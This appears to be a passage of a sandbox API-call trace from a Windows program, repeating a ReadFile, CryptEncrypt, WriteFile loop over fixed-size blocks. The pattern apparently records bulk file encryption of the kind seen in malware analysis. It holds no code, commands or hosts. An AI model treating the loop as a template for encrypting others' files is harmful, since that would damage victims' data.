[0274.156] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.156] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.157] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.159] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.159] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.161] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.162] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.163] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.164] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 